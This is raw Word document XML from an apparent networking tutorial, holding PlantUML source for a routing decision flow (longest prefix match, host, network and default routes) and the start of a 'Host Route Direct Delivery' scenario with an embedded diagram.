            <w:r w:rsidRPr="0043172D">
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t xml:space="preserve">  FontColor black</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1E1284D5" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0043172D" w:rsidRDefault="0017552F" w:rsidP="007C55F6">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0043172D">
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t>}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="477E9BD9" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0043172D" w:rsidRDefault="0017552F" w:rsidP="007C55F6">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="5F2D9DB6" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0043172D" w:rsidRDefault="0017552F" w:rsidP="007C55F6">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0043172D">
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t>title Routing Decision Flow</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="74082CB3" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0043172D" w:rsidRDefault="0017552F" w:rsidP="007C55F6">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="78A7CA35" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0043172D" w:rsidRDefault="0017552F" w:rsidP="007C55F6">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0043172D">
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t>start</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="580544C5" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0043172D" w:rsidRDefault="0017552F" w:rsidP="007C55F6">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0043172D">
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t>:Packet arrives with destination IP;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C1A99" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0043172D" w:rsidRDefault="0017552F" w:rsidP="007C55F6">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0043172D">
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t>:Extract destination IP from packet header;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0005420B" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0043172D" w:rsidRDefault="0017552F" w:rsidP="007C55F6">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0043172D">
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t>:Search routing table for matching entries;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="64C34708" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0043172D" w:rsidRDefault="0017552F" w:rsidP="007C55F6">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="3288F019" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0043172D" w:rsidRDefault="0017552F" w:rsidP="007C55F6">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0043172D">
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t>if (Any match found?) then (no)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4A6FCFE4" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0043172D" w:rsidRDefault="0017552F" w:rsidP="007C55F6">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0043172D">
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t xml:space="preserve">  :No match → Drop packet;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3E872B61" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0043172D" w:rsidRDefault="0017552F" w:rsidP="007C55F6">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0043172D">
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t xml:space="preserve">  stop</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="62980200" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0043172D" w:rsidRDefault="0017552F" w:rsidP="007C55F6">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0043172D">
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t>else (yes)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7C91AB10" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0043172D" w:rsidRDefault="0017552F" w:rsidP="007C55F6">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0043172D">
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t xml:space="preserve">  if (More than one match?) then (yes)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7B5C88AF" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0043172D" w:rsidRDefault="0017552F" w:rsidP="007C55F6">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0043172D">
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t xml:space="preserve">    :Apply Longest Prefix Match (LPM);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="27F495CA" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0043172D" w:rsidRDefault="0017552F" w:rsidP="007C55F6">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0043172D">
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t xml:space="preserve">    if (Equal prefix length?) then (yes)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6D2335BB" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0043172D" w:rsidRDefault="0017552F" w:rsidP="007C55F6">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0043172D">
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t xml:space="preserve">      :Compare metric / admin distance;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7AD12E7B" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0043172D" w:rsidRDefault="0017552F" w:rsidP="007C55F6">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0043172D">
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t xml:space="preserve">      :Select best route;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="45F12616" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0043172D" w:rsidRDefault="0017552F" w:rsidP="007C55F6">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0043172D">
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t xml:space="preserve">    else (no)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4F4EE824" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0043172D" w:rsidRDefault="0017552F" w:rsidP="007C55F6">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0043172D">
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t xml:space="preserve">      :Select route with longest prefix length;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="212C983A" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0043172D" w:rsidRDefault="0017552F" w:rsidP="007C55F6">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0043172D">
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t xml:space="preserve">    endif</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="46D8B92B" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0043172D" w:rsidRDefault="0017552F" w:rsidP="007C55F6">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0043172D">
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t xml:space="preserve">  else (no)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="03448722" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0043172D" w:rsidRDefault="0017552F" w:rsidP="007C55F6">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0043172D">
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t xml:space="preserve">    :Only one match found;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7700D507" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0043172D" w:rsidRDefault="0017552F" w:rsidP="007C55F6">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0043172D">
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t xml:space="preserve">  endif</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="75F957CA" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0043172D" w:rsidRDefault="0017552F" w:rsidP="007C55F6">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="79A9E707" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0043172D" w:rsidRDefault="0017552F" w:rsidP="007C55F6">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0043172D">
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t xml:space="preserve">  if (Is match a host route?) then (yes)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0610E11F" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0043172D" w:rsidRDefault="0017552F" w:rsidP="007C55F6">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0043172D">
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t xml:space="preserve">    :Host Direct → Send directly to host;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="50991330" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0043172D" w:rsidRDefault="0017552F" w:rsidP="007C55F6">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0043172D">
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t xml:space="preserve">  else (no)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1B8209BB" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0043172D" w:rsidRDefault="0017552F" w:rsidP="007C55F6">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0043172D">
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t xml:space="preserve">    if (Is match a network route?) then (yes)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="66BC16FC" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0043172D" w:rsidRDefault="0017552F" w:rsidP="007C55F6">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0043172D">
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t xml:space="preserve">      if (Uses gateway?) then (yes)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="58CAA965" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0043172D" w:rsidRDefault="0017552F" w:rsidP="007C55F6">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0043172D">
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t xml:space="preserve">        :Network via Gateway → Forward to next hop;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="71D17E73" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0043172D" w:rsidRDefault="0017552F" w:rsidP="007C55F6">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0043172D">
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t xml:space="preserve">      else (no)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0CECFE29" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0043172D" w:rsidRDefault="0017552F" w:rsidP="007C55F6">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0043172D">
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t xml:space="preserve">        :Network Direct → Send directly to host;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7ADF3273" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0043172D" w:rsidRDefault="0017552F" w:rsidP="007C55F6">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0043172D">
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t xml:space="preserve">      endif</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5F9F5186" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0043172D" w:rsidRDefault="0017552F" w:rsidP="007C55F6">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0043172D">
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t xml:space="preserve">    else (no)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7E07634F" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0043172D" w:rsidRDefault="0017552F" w:rsidP="007C55F6">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0043172D">
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t xml:space="preserve">      if (Is match default route?) then (yes)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7C79C189" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0043172D" w:rsidRDefault="0017552F" w:rsidP="007C55F6">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0043172D">
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t xml:space="preserve">        :Default via Gateway → Forward to next hop;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="66029E14" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0043172D" w:rsidRDefault="0017552F" w:rsidP="007C55F6">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0043172D">
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t xml:space="preserve">      else (no)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0D77421B" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0043172D" w:rsidRDefault="0017552F" w:rsidP="007C55F6">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0043172D">
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t xml:space="preserve">        :Drop packet;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="332FBB4F" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0043172D" w:rsidRDefault="0017552F" w:rsidP="007C55F6">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0043172D">
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t xml:space="preserve">      endif</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="493193B3" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0043172D" w:rsidRDefault="0017552F" w:rsidP="007C55F6">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0043172D">
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t xml:space="preserve">    endif</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0DFC173E" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0043172D" w:rsidRDefault="0017552F" w:rsidP="007C55F6">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0043172D">
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t xml:space="preserve">  endif</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1B145781" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0043172D" w:rsidRDefault="0017552F" w:rsidP="007C55F6">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0043172D">
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t>endif</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="766DA941" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0043172D" w:rsidRDefault="0017552F" w:rsidP="007C55F6">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="6803280F" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0043172D" w:rsidRDefault="0017552F" w:rsidP="007C55F6">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0043172D">
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t>stop</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5C24B49E" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0043172D" w:rsidRDefault="0017552F" w:rsidP="007C55F6">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0043172D">
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t>@enduml</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="07320431" w14:textId="77777777" w:rsidR="0017552F" w:rsidRDefault="0017552F" w:rsidP="007C55F6"/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7BCD065B" w14:textId="77777777" w:rsidR="0017552F" w:rsidRDefault="0017552F" w:rsidP="0017552F">
      <w:r>
        <w:t>Let's investigate these scenario for better underst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8"/>
        <w:gridCol w:w="1998"/>
      </w:tblGrid>
      <w:tr w:rsidR="009E0CA9" w14:paraId="0647B212" w14:textId="77777777" w:rsidTr="00DF4B7D">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="15498" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6192275C" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRPr="003E2459" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003E2459">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Scenario 1 – Host Route Direct Delivery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1998" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3EFCE0C5" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009E0CA9" w14:paraId="1E0BD612" w14:textId="77777777" w:rsidTr="00DF4B7D">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="15498" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0787217A" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1EEDD61B" wp14:editId="253B956A">
                  <wp:extent cx="7370086" cy="4078436"/>
                  <wp:effectExtent l="0" t="0" r="2540" b="0"/>
                  <wp:docPr id="3678348"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8352" cy="4105145"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1998" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="661BFCFD" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRPr="00210D9C" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00210D9C">
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t>@startuml</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5AC5748A" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRPr="00210D9C" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00210D9C">
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t>skinparam monochrome false</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6414AAEC" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRPr="00210D9C" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00210D9C">
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t>skinparam activity {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="07EE02F1" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRPr="00210D9C" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00210D9C">
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t xml:space="preserve">  BackgroundColor white</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="50F39DE8" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRPr="00210D9C" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00210D9C">
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t xml:space="preserve">  BorderColor black</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2CFDBCA0" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRPr="00210D9C" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00210D9C">
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t xml:space="preserve">  FontColor black</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1D3A1CD2" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRPr="00210D9C" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00210D9C">
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t>}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="59705DD5" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRPr="00210D9C" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
          </w:p>
